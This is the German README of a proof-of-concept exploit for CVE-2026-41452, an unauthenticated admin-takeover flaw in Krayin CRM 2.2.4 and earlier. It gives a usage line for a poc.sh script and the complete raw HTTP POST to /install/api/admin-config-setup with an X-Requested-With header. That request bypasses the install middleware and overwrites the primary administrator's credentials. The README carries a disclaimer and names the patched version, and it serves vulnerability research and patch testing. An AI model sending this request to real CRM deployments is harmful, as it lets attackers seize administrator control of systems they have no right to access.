
Proof-of-Concept-Exploit für CVE-2026-41452, eine kritische Authentifizierungsumgehung in Krayin CRM <= 2.2.4, die eine unauthentifizierte Übernahme des Admin-Kontos über eine Middleware-Umgehung ermöglicht.
Ein Proof of Concept (PoC), der eine kritische fehlende Authentifizierungs-Schwachstelle (CVE-2026-41452) demonstriert, die Krayin CRM Version 2.2.4 und früher betrifft.
Diese Schwachstelle ermöglicht es nicht authentifizierten Remote-Angreifern, die Installations-Middleware-Logik der Anwendung (CanInstall) durch das Injizieren spezifischer HTTP-Header zu umgehen, was zu einer vollständigen Überschreibung der Konfiguration des primären Administratorkontos führt.
[!WARNING]
Haftungsausschluss: Dieses Repository und die darin enthaltenen Informationen werden ausschließlich zu Bildungszwecken, Sicherheitsforschung und autorisierten defensiven Audits bereitgestellt. Unautorisiertes Testen oder Ausnutzen von Computersystemen ist streng illegal. Der Autor übernimmt keine Haftung für jeglichen Missbrauch dieses Materials.
CVE-ID: CVE-2026-41452
Schwachstellentyp: Fehlende Authentifizierung / Middleware-Bypass
Schweregrad: Kritisch (CVSS 9.8)
Betroffene Software: Krayin CRM <= 2.2.4
Gepatchte Version: Krayin CRM >= 2.2.5
Die Schwachstelle liegt in der Setup-Middleware der Anwendung. Ein nicht authentifizierter Angreifer kann einen X-Requested-With: XMLHttpRequest-Header an eine manipulierte Payload anhängen, die auf den Endpunkt /install/api/admin-config-setup abzielt. Dies unterdrückt die erwartete Weiterleitungsprüfung innerhalb der CanInstall-Middleware und legt eine nicht authentifizierte updateOrInsert-Datenbankoperation offen, die auf die fest codierte ID (1) des primären Systemadministrators abzielt.
Führen Sie das Skript gegen eine Zielinstanz aus, die Sie testen dürfen:
./poc.sh <TARGET-URL> <USERNAME> <EMAIL> <PASSWORD>
Im Hintergrund wird der Bypass durch die folgende HTTP-Transaktionsstruktur ausgelöst:
POST /install/api/admin-config-setup HTTP/1.1
Host: target-crm.local
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
name=test1&[email protected]&password=Password123